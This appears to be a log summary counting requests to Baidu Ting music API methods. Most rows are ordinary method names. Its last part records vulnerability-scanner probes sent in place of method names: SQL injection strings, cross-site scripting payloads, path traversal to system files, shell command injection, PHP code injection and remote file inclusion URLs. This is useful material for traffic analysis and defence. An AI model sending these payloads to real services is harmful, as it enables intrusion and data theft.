baidu.ting.song.getInfos	62167780
baidu.ting.song.baseInfo	27668555
baidu.ting.search.catalogSug	27456805
baidu.ting.search.lrcpic	25375601
baidu.ting.user.listenAge	18087307
baidu.ting.song.play	16902397
baidu.ting.search.common	13504152
baidu.ting.song.down	9268136
baidu.ting.song.lry	7236480
baidu.ting.user.getUserBaseInfo	6934042
baidu.ting.artist.getSongList	5455291
baidu.ting.song.getInfo	5169154
ting.baidu.diy.getPlaylists	5119550
baidu.ting.search.lrcys	5056727
baidu.ting.artist.getList	4915000
baidu.ting.search.getPhotoInfos	4848509
baidu.ting.billboard.billList	4514752
baidu.ting.user.checkSuggestVersion	3901592
baidu.ting.favorite.isCollect	3254636
baidu.ting.diy.getNowOfficalList	3159936
baidu.ting.game.gamedetail	3077036
baidu.ting.user.checkComVersion	3022903
baidu.ting.diy.gedanInfo	2977161
baidu.ting.plaza.getRecommendAlbum	2736828
baidu.ting.user.registToUC	2712204
baidu.ting.artist.getInfo	2705701
baidu.ting.user.config	2695912
baidu.ting.plaza.active	2633660
baidu.ting.radio.playAction	2518007
baidu.ting.song.playAAC	2464933
baidu.ting.active.start	2310011
baidu.ting.plaza.getFocusPic	1644728
baidu.ting.search.suggestion	1485942
baidu.ting.artist.getinfo	1420622
baidu.ting.radio.getChannelSong	1375907
baidu.ting.album.getAlbumInfo	1358712
baidu.ting.diy.gedanHot	1310395
baidu.ting.favorite.getCollectSong	1297632
baidu.ting.diy.addListenCount	1133936
baidu.ting.diy.category	943856
baidu.ting.plaza.recdaily	931637
ting.baidu.plaza.recdaily	926302
baidu.ting.artist.getAlbumList	862536
baidu.ting.plaza.getPartDesc	823542
baidu.ting.song.audio	737765
baidu.ting.user.down	710922
baidu.ting.tag.songlist	696422
baidu.ting.diy.gedan	678911
baidu.ting.user.getMessage	671338
baidu.ting.tag.getHotTag	655243
	604229
baidu.ting.feedback.song	580740
baidu.ting.user.RegistToImsg	573918
baidu.ting.diy.getSongFromOfficalList	518244
baidu.ting.radio.getCategoryList	447823
baidu.ting.billboard.billCategory	360329
baidu.ting.search.lrcyss	347109
baidu.ting.search.getPhotoInfo	324219
baidu.ting.artist.get72HotArtist	289120
baidu.ting.diy.getPlaylists	277909
baidu.ting.game.gamelist	215582
baidu.ting.favorite.getFavoriteSong	207008
baidu.ting.plaza.recommend	202799
baidu.ting.song.buffer	175244
baidu.ting.video.getList	149228
baidu.ting.song.getMulInfos	136586
baidu.ting.favorite.addSongFavorites	133442
baidu.ting.diy.search	111528
baidu.ting.tag.getAllTag	111181
baidu.ting.diy.getSimilarGedan	98390
baidu.ting.favorite.addSongFavorite	91949
baidu.ting.diy.getOfficialDiyList	89122
baidu.ting.video.play	83270
baidu.ting.mv.getIndexMV	62239
baidu.ting.artist.getSpecialSongList	54360
baidu.ting.user.checkVersion	47045
baidu.ting.plaza.getNewSongs	46030
baidu.ting.favorite.delCollectSong	45908
baidu.ting.mv.playMV	42794
ting.baidu.diy.getPlaylist	34153
baidu.ting.radio.getArtistChannelSong	30301
baidu.ting.artist.getInfoList	25331
baidu.ting.radio.getFavoriteSong	24183
baidu.ting.plaza.getArtistPlaza	20030
baidu.ting.user.nplogin	19895
baidu.ting.diy.getPlaylist	19120
baidu.ting.radio.serv	18091
baidu.ting.mv.searchMV	15041
baidu.ting.artist.getHighSongTitle	14221
baidu.ting.feedback.crash	13066
baidu.ting.diy.saveList	12497
ting.baidu.film.getFilmInfo	12431
baidu.ting.album.getList	12074
baidu.ting.song.getMulInfo	9270
baidu.ting.favorite.delSongFavorite	9099
baidu.ting.song.cloud	8977
baidu.ting.artist.getQianQianArtist	7191
baidu.ting.diy.addListSong	5441
baidu.ting.diy.delListSong	4810
baidu.ting.weixin.response	4763
baidu.ting.diy.delList	4732
baidu.ting.user.logout	4709
baidu.ting.video.category	4521
baidu.ting.user.regPassport	4333
baidu.ting.billboard.catalog	3946
ting.baidu.song.lry	3374
baidu.ting.artist.getHighSongList	3372
baidu.ting.colorRing.listen	3313
ting.baidu.artistapp.renum	2807
baidu.ting.user.getMobileVcode	2750
baidu.ting.mv.getMultiSongMVInfo	2502
baidu.ting.colorRing.getCode	2364
baidu.ting.favorite.delSongFavorites	2282
baidu.ting.colorRing.authset	2240
baidu.ting.diy.getRecommendSpeical	1731
baidu.ting.favorite.getFavoriteAlbum	1625
baidu.ting.feedback.info	1353
baidu.ting.mv.getMVCategory	1331
baidu.ting.artist.getSongRank	1267
baidu.ting.artist.getSong	1236
baidu.ting.artist.getSongVote	1075
baidu.ting.diy.upList	1012
baidu.ting.favorite.getListenHistory	861
baidu.ting.diy.addList	732
ting.baidu.artistapp.brief	654
baidu.ting.video.recMv	581
baidu.ting.favorite.getOffenListenList	522
ting.baidu.search.lrcpic	421
baidu.ting.colorRing.subscribe	356
baidu.ting.song.getSuoSongInfo	352
baidu.ting.artist.getInfoByName	329
baidu.ting.user.activate	318
baidu.ting.colorRing.toneset	221
baidu.ting.favorite.getInfoFromView	208
baidu.ting.favorite.addAlbumFavorite	207
baidu.ting.user.login	184
baidu.ting.artistapp.photo	182
baidu.ting.song.getHash	138
ting.baidu.plaza.getFocusPic	125
ting.baidu.artistapp.briefs	119
ting.baidu.artistapp.newList	90
baidu.ting.plaza.getMisNewSong	88
ting.baidu.artistapp.news	82
baidu.ting.favorite.delAlbumFavorite	71
baidu.ting.user.addPassportInfo	49
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	38
baidu.ting.game.catalog	37
ting.baidu.video.getList	13
baidu.ting.album.getAlbumstyle	12
(	10
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	9
ting.baidu.artistapp.send	8
\' (	8
baidu.ting.outerPassport.profile	7
baidu.ting.song.play\';alert(1);\'	6
../../../../../../../../../../etc/rc.d/rc.local_	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	4
file:///etc/rc.d/rc.local	4
http://cirt.lnet/rfiinc.txt_.html	4
${@print(md5(812812))}	4
../../../../../../../../../../etc/rc.d/rc.local	4
string:{var_dump(md5(812812))}	4
baidu.ting.game.gameplay	4
\'];${@print(md5(812812))};//	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	4
baidu.ting.song.play<script>confirm(1)</script>	3
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	3
../../../../../../../../../../etc/passwd_	3
set	3
baidu.ting.song.playjavascript:alert(1)	3
baidu.ting.song.play\'\";alert(1);//	3
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	3
baidu.ting.song.play\' and \'8281\'=\'8281	3
baidu.ting.song.play\";alert(1);\"	3
file:///etc/passwd_	3
baidu.ting.song.play\') and 8288=8288 and (\'	3
1;cat /etc/rc.d/rc.local;	3
1\\\";cat /etc/rc.d/rc.local;\\\"	3
baidu.ting.song.play;alert(1);//	3
c:/windows/win.ini_	3
baidu.ting.song.play</script><script>alert(1);//	3
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	3
%{	3
${	3
file:///etc/passwd	3
1\';cat /etc/rc.d/rc.local;\'	3
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
c:/windows/win.ini	3
http://cirt.lnet/rfiinc.txt_	3
baidu.ting.song.play>\'>\"><script>alert(1)</script>	3
baidu.ting.song.play--></script><script>alert(1)</script>	3
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	3
/usr/bin/id;	3
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	3
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	3
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	3
baidu.ting.song.play</textarea></title><script>alert(1)</script>	3
http://cirt.lnet/rfiinc.txt	3
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	2
baidu.ting.song.lry\';alert(1);\'	2
http://10.42.7.217/?1385148366.5	2
http://10.42.7.217/?1385131485.8	2
ting.baidu.album.getList	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	2
file:///etc/passwd_.jpg	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
../../../../../../../../../../etc/rc.d/rc.local_.php	2
c:/windows/win.ini_.php	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	2
baidu.ting.song.play; WAITFOR DELAY \'0:0:5\';--	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL	1
baidu.ting.song.lry</script><script>alert(1);//	1
baidu.ting.song.play WAITFOR DELAY \'0:0:5\'--	1
baidu.ting.song.lry<script>confirm(1)</script>	1
baidu.ting.song.play\' UNION ALL SELECT NULL	1
baidu.ting.song.play UNION ALL SELECT NULL--	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.play\') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (\'SNUy\'=\'SNUy	1
baidu.ting.song.play; SELECT PG_SLEEP(5);--	1
baidu.ting.song.play) UNION ALL SELECT NULL	1
baidu.ting.song.play UNION ALL SELECT NULL	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
file:///etc/rc.d/rc.local_	1
baidu.ting.song.play; SELECT SLEEP(5);--	1
../../../../../../../../../../etc/passwd	1
baidu.ting.song.lryjavascript:alert(1)	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND \'Psjd\'=\'Psjd	1
baidu.ting.song.play\') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (\'caYi\'=\'caYi	1
baidu.ting.song.play\')\'\"\'\'()\'(	1
baidu.ting.song.play AND 7413=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7413=7413) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL)	1
baidu.ting.song.play\') AND 7413=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7413=7413) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND (\'HVMK\'=\'HVMK	1
baidu.ting.song.play AND 3322=CONVERT(INT,(CHAR(58) CHAR(104) CHAR(109) CHAR(97) CHAR(58) (SELECT (CASE WHEN (3322=3322) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(99) CHAR(113) CHAR(108) CHAR(58)))	1
baidu.ting.song.lry\'\";alert(1);//	1
baidu.ting.song.play\') AND 9419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(87)||CHR(110)||CHR(77),5) AND (\'Xuux\'=\'Xuux	1
baidu.ting.song.play AND 7199=1603	1
baidu.ting.song.play AND 4619=4619	1
http://10.42.7.217/?1385122543.14	1
baidu.ting.song.play AND SLEEP(5)	1
baidu.ting.song.play\') UNION ALL SELECT NULL	1
baidu.ting.song.lry\";alert(1);\"	1
baidu.ting.song.play\' AND 9419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(87)||CHR(110)||CHR(77),5) AND \'mVph\'=\'mVph	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND \'dvym\'=\'dvym	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND \'CzbC\'=\'CzbC	1
baidu.ting.song.play\' AND 7413=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7413=7413) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND \'fzgA\'=\'fzgA	1
baidu.ting.song.play) AND 7413=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7413=7413) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND (1926=1926	1
baidu.ting.song.play\') AND (SELECT 5443 FROM(SELECT COUNT(*),CONCAT(CHAR(58,104,109,97,58),(SELECT (CASE WHEN (5443=5443) THEN 1 ELSE 0 END)),CHAR(58,99,113,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (\'TSJj\'=\'TSJj	1
baidu.ting.song.play\') AND 3322=CONVERT(INT,(CHAR(58) CHAR(104) CHAR(109) CHAR(97) CHAR(58) (SELECT (CASE WHEN (3322=3322) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(99) CHAR(113) CHAR(108) CHAR(58))) AND (\'bXsP\'=\'bXsP	1
baidu.ting.song.play AND (SELECT 5443 FROM(SELECT COUNT(*),CONCAT(CHAR(58,104,109,97,58),(SELECT (CASE WHEN (5443=5443) THEN 1 ELSE 0 END)),CHAR(58,99,113,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)	1
file:///etc/rc.d/rc.local_.html	1
c:/windows/win.ini_.html	1
baidu.ting.song.play\' AND 3322=CONVERT(INT,(CHAR(58) CHAR(104) CHAR(109) CHAR(97) CHAR(58) (SELECT (CASE WHEN (3322=3322) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(99) CHAR(113) CHAR(108) CHAR(58))) AND \'JvYp\'=\'JvYp	1
baidu.ting.song.play\') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (\'alNC\'=\'alNC	1
baidu.ting.song.lry;alert(1);//	1
baidu.ting.song.play\') AND 8523=CAST(CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (8523=8523) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58) AS NUMERIC) AND (\'yNfx\'=\'yNfx	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.jpg	1
baid.ting.baidu.com	1
baidu.ting.song.play AND 8523=CAST(CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (8523=8523) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58) AS NUMERIC)	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND \'vWKR\'=\'vWKR	1
baidu.ting.song.play) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (8834=8834	1
baidu.ting.song.play) WAITFOR DELAY \'0:0:5\'-- AND (5830=5830	1
baidu.ting.song.play) UNION ALL SELECT NULL, NULL, NULL, NULL	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL, NULL, NULL	1
baidu.ting.song.play AND 8669=(SELECT 8669 FROM PG_SLEEP(5))	1
baidu.ting.song.play\') AND 9389=3914 AND (\'mJDL\'=\'mJDL	1
baidu.ting.song.play\') AND 4619=4619 AND (\'GlWw\'=\'GlWw	1
baidu.ting.song.play\') UNION ALL SELECT NULL, NULL, NULL	1
baidu.ting.song.play\') AND SLEEP(5) AND (\'zuYF\'=\'zuYF	1
baidu.ting.song.play); SELECT SLEEP(5);--  AND (8308=8308	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL, NULL	1
baidu.tingza.gza.getFocusPic	1
baidu.ting.song.play) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (1668=1668	1
baidu.ting.song.play\' AND 4619=4619 AND \'RbSM\'=\'RbSM	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL, NULL--	1
baidu.ting.song.play\' AND (SELECT 5443 FROM(SELECT COUNT(*),CONCAT(CHAR(58,104,109,97,58),(SELECT (CASE WHEN (5443=5443) THEN 1 ELSE 0 END)),CHAR(58,99,113,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND \'liNr\'=\'liNr	1
baidu.ting.song.lry--></script><script>alert(1)</script>	1
baidu.ting.song.play\' AND SLEEP(5) AND \'RjwC\'=\'RjwC	1
baidu.ting.song.play) UNION ALL SELECT NULL, NULL, NULL	1
baidu.ting.song.play) AND (SELECT 5443 FROM(SELECT COUNT(*),CONCAT(CHAR(58,104,109,97,58),(SELECT (CASE WHEN (5443=5443) THEN 1 ELSE 0 END)),CHAR(58,99,113,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7412=7412	1
baidu.ting.song.play\' AND 8523=CAST(CHR(58)||CHR(104)||CHR(109)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (8523=8523) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(99)||CHR(113)||CHR(108)||CHR(58) AS NUMERIC) AND \'qIhW\'=\'qIhW	1
baidu.ting.song.play) UNION ALL SELECT NULL-- AND (53=53	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL, NULL	1
baidu.ting.song.play\' AND 6745=1717 AND \'JmmE\'=\'JmmE	1
baidu.ting.song.play\') UNION ALL SELECT NULL, NULL	1
baidu.ting.song.play) AND 3322=CONVERT(INT,(CHAR(58) CHAR(104) CHAR(109) CHAR(97) CHAR(58) (SELECT (CASE WHEN (3322=3322) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(99) CHAR(113) CHAR(108) CHAR(58))) AND (6571=6571	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	1
baidu.ting.song.play\' UNION ALL SELECT NULL, NULL	1
baidu.ting.song.play) AND 4619=4619 AND (6461=6461	1
baidu.ting.song.play); SELECT PG_SLEEP(5);-- AND (9998=9998	1
baidu.ting.song.play) AND 3509=9047 AND (8643=8643	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL--	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.play UNION ALL SELECT NULL, NULL, NULL, NULL--	1
4581	1
1190	1
